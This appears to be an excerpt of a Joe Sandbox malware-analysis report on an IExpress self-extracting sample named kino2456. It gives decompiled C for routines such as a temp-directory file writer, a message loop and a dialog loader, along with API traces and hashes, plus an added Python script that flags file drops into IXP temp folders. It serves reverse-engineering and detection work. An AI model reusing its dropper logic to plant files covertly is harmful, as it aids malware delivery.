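Decoded this way, the five dumps read like the sections of one image, matching the report's "based on PE: true": the header at 0x960000 is PAGE_READONLY, the code at 0x961000 is PAGE_EXECUTE_READ (all of the call sites above fall in it), the data at 0x968000 is PAGE_READWRITE (which is where the security cookie read from 0x968004 in the prologue lives), and the regions from 0x96A000 are read-only again.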

C-Code - Quality: 100% (trailing comment on each statement is the instruction address the report lists for that line)
E00967155() {
	void* _v8;
	struct _FILETIME _v16;
	signed int _v20;
	union _LARGE_INTEGER _v24;
	signed int _t23;
	signed int _t36;
	signed int _t37;
	signed int _t39;

	_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;	// 0x0096715d
	_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;	// 0x00967161
	_t23 =  *0x968004; // 0xf4cc89a0	// 0x00967165
	if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {	// 0x00967178
		GetSystemTimeAsFileTime( &_v16);	// 0x00967182
		_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;	// 0x0096718e
		_v8 = _v8 ^ GetCurrentProcessId();	// 0x00967197
		_v8 = _v8 ^ GetCurrentThreadId();	// 0x009671a0
		_v8 = GetTickCount() ^ _v8 ^  &_v8;	// 0x009671b1
		QueryPerformanceCounter( &_v24);	// 0x009671b8
		_t36 = _v20 ^ _v24.LowPart ^ _v8;	// 0x009671c4
		_t39 = _t36;	// 0x009671c7
		if(_t36 == 0xbb40e64e || ( *0x968004 & 0xffff0000) == 0) {	// 0x009671cb
			_t36 = 0xbb40e64f;	// 0x009671d5
			_t39 = 0xbb40e64f;	// 0x009671da
		}	// 0x009671da
		 *0x968004 = _t39;	// 0x009671dc
	}	// 0x009671dc
	_t37 =  !_t36;	// 0x009671e2
	 *0x968008 = _t37;	// 0x009671e5
	return _t37;	// 0x009671ee
}

APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00967182
• GetCurrentProcessId.KERNEL32 ref: 00967191
• GetCurrentThreadId.KERNEL32 ref: 0096719A
• GetTickCount.KERNEL32 ref: 009671A3
• QueryPerformanceCounter.KERNEL32(?), ref: 009671B8
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: c6f1f53d36ba8bd18b85c16c1201dc93f44ca6ce3fc3773a807b4b9fa2b80d8b
• Instruction ID: 3eef13b636901c1da9f82f88ce48d61797c7ce5ffd64658bf7d542487794d783
• Opcode Fuzzy Hash: c6f1f53d36ba8bd18b85c16c1201dc93f44ca6ce3fc3773a807b4b9fa2b80d8b
• Instruction Fuzzy Hash: 70111C71D29208EFCB10DFF8DA48A9EB7F8EF59315F62495AD805E7210EA709A049F41
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88% (trailing comment on each statement is the instruction address the report lists for that line)
E009663C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
	signed int _v8;
	char _v268;
	long _v272;
	void* _v276;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t15;
	long _t28;
	struct _OVERLAPPED* _t37;
	void* _t39;
	signed int _t40;

	_t15 =  *0x968004; // 0xf4cc89a0	// 0x009663cb
	_v8 = _t15 ^ _t40;	// 0x009663d2
	_v272 = _v272 & 0x00000000;	// 0x009663d8
	_push(__ecx);	// 0x009663ea
	_v276 = _a16;	// 0x009663f3
	_t37 = 1;	// 0x00966401
	E00961781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");	// 0x00966402
	E0096658A( &_v268, 0x104, _a12);	// 0x00966410
	_t28 = 0;	// 0x00966415
	_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);	// 0x00966433
	if(_t39 != 0xffffffff) {	// 0x00966438
		_t28 = _a4;	// 0x00966449
		if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {	// 0x00966463
			 *0x969124 = 0x80070052;	// 0x0096646d
			_t37 = 0;	// 0x00966477
		}	// 0x00966477
		CloseHandle(_t39);	// 0x0096647a
	} else {	// 0x0096643a
		 *0x969124 = 0x80070052;	// 0x0096643a
		_t37 = 0;	// 0x00966444
	}	// 0x00966444
	return E00966CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);	// 0x00966492
}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0096642D
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0096645B
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0096647A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 009663EB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                    • API String ID: 1065093856-3290032183
                                                                                                                                                                                                                                    • Opcode ID: 0a7ce9254402b5165fff5e9e7fcab0faea0a37add65dfd5f23cc27bf15f6ecde
                                                                                                                                                                                                                                    • Instruction ID: a465c9b8d0ae0f1c697d33ded9f37d676921d2a98a8892dc9c6267d01752fdae
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a7ce9254402b5165fff5e9e7fcab0faea0a37add65dfd5f23cc27bf15f6ecde
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1821D271A04218ABDB20DF25DC85FEB777CEB85314F1041A9F585A3290DEB46D849FA4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
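The "APIs" bullets above record the file-drop the function at 0x00966402 performs: CreateFileA with desired access 0x40000000 (GENERIC_WRITE) and creation disposition 2 (CREATE_ALWAYS), followed by WriteFile and CloseHandle, with the IExpress extraction directory C:\Users\user\AppData\Local\Temp\IXP002.TMP\ showing up as trailing stack context (lpFileName itself is printed as "?"). The following script is an added example written for this page, not Joe Sandbox code: it parses those bullet lines (including the "Part of subcall function" prefix used further down), decodes the CreateFile constants, and flags writes that create or overwrite a file under an IXP###.TMP directory. The sample lines are copied from this section of the report; the flagging rule is the editor's own heuristic, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox per-function "APIs" bullet lines and flag the
IExpress temp-directory file drop seen in this report.

Added example for this page (not Joe Sandbox code). SAMPLE_LINES are
copied from the API listings in this section; the drop rule
(GENERIC_WRITE + CREATE_ALWAYS + an IXP###.TMP path) is the editor's own
heuristic and an assumption of this example, not a report signature.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Copied verbatim from the report's API listings (bullet and prefix included).
SAMPLE_LINES = [
    "• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\\Users\\user\\AppData\\Local\\Temp\\IXP002.TMP\\), ref: 0096642D",
    "• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\\Users\\user\\AppData\\Local\\Temp\\IXP002.TMP\\), ref: 0096645B",
    "• CloseHandle.KERNEL32(00000000,?,C:\\Users\\user\\AppData\\Local\\Temp\\IXP002.TMP\\), ref: 0096647A",
    "• Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518",
    "• Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554",
]

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Win32 constants for CreateFile's dwDesiredAccess / dwCreationDisposition.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")
# IExpress self-extractors unpack into %TEMP%\IXP000.TMP, IXP001.TMP, ...
IXP_TMP_RE = re.compile(r"\\Temp\\IXP\d{3}\.TMP\\", re.IGNORECASE)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw slots as printed; "?" means unresolved
    ref: int                 # address of the call site
    subcall: Optional[int]   # function the call was attributed to, if any


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for one bullet line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    sub = m.group("sub")
    return ApiCall(api=m.group("api"), module=m.group("mod"),
                   args=[a.strip() for a in m.group("args").split(",")],
                   ref=int(m.group("ref"), 16),
                   subcall=int(sub, 16) if sub else None)


def parse_api_lines(lines) -> List[ApiCall]:
    return [c for c in (parse_api_line(l) for l in lines) if c is not None]


def _hex(slot: str) -> Optional[int]:
    # Slots that are "?" or strings (e.g. "doza2") are not numeric constants.
    try:
        return int(slot, 16)
    except ValueError:
        return None


def decode_create_file(call: ApiCall):
    """(access names, disposition name, path-looking slots) for CreateFileA/W.

    The report prints the real parameters first and then extra stack slots,
    so the directory string shows up after hTemplateFile, not as lpFileName.
    """
    access = _hex(call.args[1]) if len(call.args) > 1 else None
    disp = _hex(call.args[4]) if len(call.args) > 4 else None
    names = [n for bit, n in GENERIC.items() if access is not None and access & bit]
    paths = [a for a in call.args if WIN_PATH_RE.match(a)]
    return names, DISPOSITION.get(disp, "?"), paths


def drop_indicators(calls: List[ApiCall]):
    """Call sites that create/overwrite a file for writing under IXP###.TMP."""
    hits = []
    for c in calls:
        if not c.api.startswith("CreateFile"):
            continue
        names, disp, paths = decode_create_file(c)
        if ("GENERIC_WRITE" in names and disp == "CREATE_ALWAYS"
                and any(IXP_TMP_RE.search(p) for p in paths)):
            hits.append((c.ref, paths[0]))
    return hits


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    for c in parsed:
        where = f" (via {c.subcall:08X})" if c.subcall is not None else ""
        print(f"{c.ref:08X} {c.api}.{c.module}{where} {c.args}")
    for ref, path in drop_indicators(parsed):
        print(f"file drop into IExpress temp dir at {ref:08X}: {path}")
```

The rule requires both GENERIC_WRITE and CREATE_ALWAYS so that a later OPEN_EXISTING read of something already in the same IXP directory is not reported as a drop; relax it to any write access if you want OPEN_ALWAYS appends as well.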

C-Code - Quality: 100%
			// Decompiled by Joe Sandbox. Takes a NUL-terminated string in ECX, copies it
			// into a freshly allocated buffer and pushes an 8-byte node {string, next}
			// onto the singly linked list whose head lives at 0x9691e0. Returns 1 on
			// success; on either allocation failure it shows an error (string resource
			// 0x4b5 via E009644B9, which ends in LoadStringA/MessageBoxA) and returns 0.
			// _t5 and _t8 below are undeclared decompiler temporaries (register values
			// passed through unchanged); they are left as the decompiler emitted them.
			E009647E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);  // LPTR: zero-initialised 8-byte list node
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {  // inline strlen of the input string
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);  // strlen + 1 bytes for the copy
					 *_t34 = _t24;  // node->string
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {  // strlen again, for the copy length
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00961680(_t24, _t28 - _t19 + 1, _t33);  // presumably copies the string into the new buffer (helper not shown here)
						_t11 =  *0x9691e0; // 0x31a8e18  (current list head)
						 *(_t34 + 4) = _t11;  // node->next = head
						 *0x9691e0 = _t34;    // head = node
						return 1;
					}
					// string buffer allocation failed: report, free the node, fail
					_t25 =  *0x968584; // 0x0  (owner HWND for the message box)
					E009644B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				// node allocation failed: report and fail
				_t26 =  *0x968584; // 0x0
				E009644B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

Instruction addresses for the decompiled lines of E009647E0 (side-by-side address column, collapsed): 0x009647e8 to 0x00964876

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00964E6F), ref: 009647EA
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00964823
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00964847
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00964851
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                    • API String ID: 359063898-3290032183
                                                                                                                                                                                                                                    • Opcode ID: 8e6af130204eb8339861a8f7a8d131f018a73a9e76212f4ba09e2ea316620f2f
                                                                                                                                                                                                                                    • Instruction ID: 867643a8e36e689f23e569633377b9bd4d2c830e27223d603f788f3739fc44a7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e6af130204eb8339861a8f7a8d131f018a73a9e76212f4ba09e2ea316620f2f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C1125B9208641AFD7249F649C18F773B9EEBC6340B14851DFA82DB341DE768C069760
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
			E00963680(void* __ecx) {
				void* _v8;              // waitable handle passed in ECX (the object this loop waits on)
				struct tagMSG _v36;     // MSG buffer for the message pump
				int _t8;
				struct HWND__* _t16;    // decompiler-typed as HWND, but used only as a flag: 1 once WM_QUIT has been seen

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					// Block until the handle is signaled or any input arrives
					// (0xffffffff == INFINITE, 0x4ff == QS_ALLINPUT). A return of 0 (WAIT_OBJECT_0)
					// means the handle was signaled; any other value means a message is pending.
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					// Drain the thread's message queue (last argument 1 == PM_REMOVE).
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {   // 0x12 == WM_QUIT
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;                 // remember WM_QUIT, but finish draining the queue first
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;                     // no WM_QUIT yet: go back to waiting on the handle
						}
					}
					break;                                // WM_QUIT received: stop waiting
				}
				// Returns 0 when the handle was signaled, otherwise the last PeekMessageA result (0 after WM_QUIT).
				return _t8;
			}


APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0096369F
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009636B2
• DispatchMessageA.USER32(?), ref: 009636CB
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009636DA
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsWait
• String ID:
• API String ID: 2776232527-0
• Opcode ID: 33adad63413a4d2f48042cce36d58e13e0b0f5a237e47887d810a06747e95931
• Instruction ID: 7ca420f7171ad7d025bfd66b80848ed7346718a704a86febe595a365c118afa0
• Opcode Fuzzy Hash: 33adad63413a4d2f48042cce36d58e13e0b0f5a237e47887d810a06747e95931
• Instruction Fuzzy Hash: 1F01A7729082157BDB304BA69C49EEB76BCEBC6B10F00411DF905F2180D5A5D640DA60
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E00966517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                    				struct HRSRC__* _t6;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                    				int _t24;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 =  *0x969a3c; // 0x960000
                                                                                                                                                                                                                                    				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                    					E009644B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					_t24 = _a16;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                    							_push(_a12);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                    						FreeResource(_t21);
                                                                                                                                                                                                                                    						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t24;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x0096651f
                                                                                                                                                                                                                                    0x0096652a
                                                                                                                                                                                                                                    0x00966534
                                                                                                                                                                                                                                    0x0096656b
                                                                                                                                                                                                                                    0x00966577
                                                                                                                                                                                                                                    0x0096657c
                                                                                                                                                                                                                                    0x00966536
                                                                                                                                                                                                                                    0x0096653e
                                                                                                                                                                                                                                    0x00966542
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966544
                                                                                                                                                                                                                                    0x00966547
                                                                                                                                                                                                                                    0x0096654c
                                                                                                                                                                                                                                    0x00966549
                                                                                                                                                                                                                                    0x00966549
                                                                                                                                                                                                                                    0x00966549
                                                                                                                                                                                                                                    0x0096655e
                                                                                                                                                                                                                                    0x00966560
                                                                                                                                                                                                                                    0x00966569
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966569
                                                                                                                                                                                                                                    0x00966542
                                                                                                                                                                                                                                    0x00966587

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00960000,000007D6,00000005), ref: 0096652A
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00960000,00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00966538
                                                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(00960000,00000000,00000547,009619E0,00000000), ref: 00966557
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00966560
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1214682469-0
                                                                                                                                                                                                                                    • Opcode ID: 3b0b9bd87d5745e599333eb5582e71d32f28faac536f68ac7a5923cbc3cd1c43
                                                                                                                                                                                                                                    • Instruction ID: d8203e524f834720c5a63791f6e898b2461e6c246a80b27ee927073f1568d0c4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b0b9bd87d5745e599333eb5582e71d32f28faac536f68ac7a5923cbc3cd1c43
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E01F973104615BBDB106FA99C49DBB7AACEBC6761F010129FE11E3150DBB1CD10EAA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			// Removes the last path component in place: walks back with CharPrevA to the last '\\' and
                                                                                                                                                                                                                                    			// writes a NUL there; the backslash itself is kept when it is the first character or follows a
                                                                                                                                                                                                                                    			// drive-letter colon (e.g. "C:\"). Returns 1 when the string was shortened, otherwise 0.
                                                                                                                                                                                                                                    			E009665E8(char* __ecx) {
                                                                                                                                                                                                                                    				char _t3;
                                                                                                                                                                                                                                    				char _t10;
                                                                                                                                                                                                                                    				char* _t12;
                                                                                                                                                                                                                                    				char* _t14;
                                                                                                                                                                                                                                    				char* _t15;
                                                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t12 = __ecx;
                                                                                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                                                                                    				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                    				_t10 = 0;
                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                    					_t3 =  *_t12;
                                                                                                                                                                                                                                    					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                    				} while (_t3 != 0);
                                                                                                                                                                                                                                    				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                    					if(_t16 <= _t15) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                    							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t16 = _t10;
                                                                                                                                                                                                                                    						_t10 = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_push(_t16);
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                    					return _t10;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x009665e8
                                                                                                                                                                                                                                    0x009665ed
                                                                                                                                                                                                                                    0x009665ef
                                                                                                                                                                                                                                    0x009665f2
                                                                                                                                                                                                                                    0x009665f4
                                                                                                                                                                                                                                    0x009665f4
                                                                                                                                                                                                                                    0x009665f6
                                                                                                                                                                                                                                    0x009665f7
                                                                                                                                                                                                                                    0x00966608
                                                                                                                                                                                                                                    0x00966611
                                                                                                                                                                                                                                    0x00966618
                                                                                                                                                                                                                                    0x0096661c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096660e
                                                                                                                                                                                                                                    0x00966623
                                                                                                                                                                                                                                    0x00966625
                                                                                                                                                                                                                                    0x0096663b
                                                                                                                                                                                                                                    0x0096663b
                                                                                                                                                                                                                                    0x0096663d
                                                                                                                                                                                                                                    0x00966641
                                                                                                                                                                                                                                    0x00966610
                                                                                                                                                                                                                                    0x00966610
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966610
                                                                                                                                                                                                                                    0x00966644
                                                                                                                                                                                                                                    0x00966647
                                                                                                                                                                                                                                    0x00966647
                                                                                                                                                                                                                                    0x00966621
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

APIs
• CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00962B33), ref: 00966602
• CharPrevA.USER32(?,00000000), ref: 00966612
• CharPrevA.USER32(?,00000000), ref: 00966629
• CharNextA.USER32(00000000), ref: 00966635
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Char$Prev$Next
• String ID:
• API String ID: 3260447230-0
• Opcode ID: 566102eb8426ccf2dc3604a2384d704f69e33cac07faa6a2700c7384031c77c0
• Instruction ID: 9cdbbddc89e6f22afd72a0bc3f64e3ce97bcf01eb9626828ad9246c67f33afca
• Opcode Fuzzy Hash: 566102eb8426ccf2dc3604a2384d704f69e33cac07faa6a2700c7384031c77c0
